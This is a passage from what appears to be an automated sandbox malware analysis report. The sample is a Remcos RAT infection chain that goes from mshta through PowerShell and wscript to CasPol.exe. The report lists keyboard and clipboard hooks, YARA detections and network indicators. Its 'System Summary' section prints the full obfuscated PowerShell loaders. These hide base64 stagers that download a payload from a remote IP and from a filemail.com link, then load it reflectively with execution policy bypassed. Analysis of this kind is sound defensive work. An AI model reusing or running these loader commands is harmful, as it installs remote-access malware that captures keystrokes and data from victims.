                    Source: powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com
                    Source: powershell.exe, 00000010.00000002.1669609816.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
                    Source: powershell.exe, 0000000E.00000002.2079393910.00000000051DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6LR
                    Source: powershell.exe, 00000001.00000002.1414653804.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303936513.0000000005371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079393910.00000000051F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000004C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000001.00000002.1414653804.000000000550D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000001.00000002.1421144583.00000000060A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1306026171.00000000063D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: mshta.exe, 00000000.00000003.1257089016.0000000006827000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1290146069.0000000006670000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1242645805.00000000067C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1273166507.00000000056B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1255793912.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1264355476.0000000006FD0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1251530852.0000000007041000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1259885383.00000000070AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1242578602.0000000007446000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1250574154.0000000006827000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1250014151.00000000067C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1282036247.00000000056B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1271739816.0000000006833000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1252695052.00000000066F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1251672134.00000000056B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1255340938.00000000074B0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1283281228.00000000066E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1252283963.000000000675C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1255426669.0000000007440000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1290936484.0000000007040000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1252470032.00000000066E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.html-code-generator.com
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.7:49713 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000018_2_004099E4
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,18_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,18_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,18_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,18_2_00409B10
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3693144012.00000000027BE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3689257366.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041BB77 SystemParametersInfoW,18_2_0041BB77

                    System Summary

                    barindex
                    Detected Cobalt Strike Beacon
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENTJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"Jump to behavior
                    Malicious sample detected (through community Yara rule)
